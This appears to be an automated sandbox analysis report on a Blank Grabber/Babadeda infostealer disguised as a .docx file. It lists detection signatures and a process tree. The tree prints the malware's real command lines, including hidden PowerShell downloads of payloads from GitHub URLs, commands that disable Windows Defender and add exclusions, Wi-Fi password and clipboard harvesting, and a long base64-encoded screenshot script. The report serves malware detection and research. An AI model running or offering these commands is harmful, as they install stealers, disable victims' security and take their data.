Edit tour

Windows Analysis Report
Cooperative Agreement0000800380.docx.exe

Overview

General Information

Sample name:	Cooperative Agreement0000800380.docx.exe
Analysis ID:	1569492
MD5:	24ffda8b313b8867568168889eda370f
SHA1:	dbdc131878ae66320104bcd33cc32021df45eb72
SHA256:	759a3f120cd0280ec88cbd5ad614eeffb89d3a0cf65421f6bf7faf787a7dc282
Tags:	exeuser-James_inthe_box
Infos:

Detection

Babadeda, Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Sigma detected: Suspicious Double Extension File Execution

Yara detected Babadeda

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found pyInstaller with non standard icon

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Modifies the hosts file

Powershell drops PE file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses an obfuscated file name to hide its real file extension (double extension)

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Writes or reads registry keys via WMI

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Too many similar processes found

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Cooperative Agreement0000800380.docx.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe" MD5: 24FFDA8B313B8867568168889EDA370F)

cmd.exe (PID: 3852 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5216 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 280 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)

dllhost.exe (PID: 5680 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

calc.exe (PID: 5436 cmdline: calc.exe MD5: 5DA8C98136D98DFEC4716EDD79C7145F)

chost.exe (PID: 4336 cmdline: chost.exe MD5: 78F52BE4313947325B63CDB27B35C6DC)

chost.exe (PID: 280 cmdline: chost.exe MD5: 78F52BE4313947325B63CDB27B35C6DC)

cmd.exe (PID: 7264 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7448 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7272 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7416 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 3704 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 7288 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 7408 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cmd.exe (PID: 7636 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7688 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7768 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7984 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 8068 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 8080 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 8132 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8164 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2852 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7300 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 480 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 2872 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7744 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7352 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7928 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7968 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7264 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7924 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7980 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7488 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 7972 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 2304 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 8104 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 5216 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 5724 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7320 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAb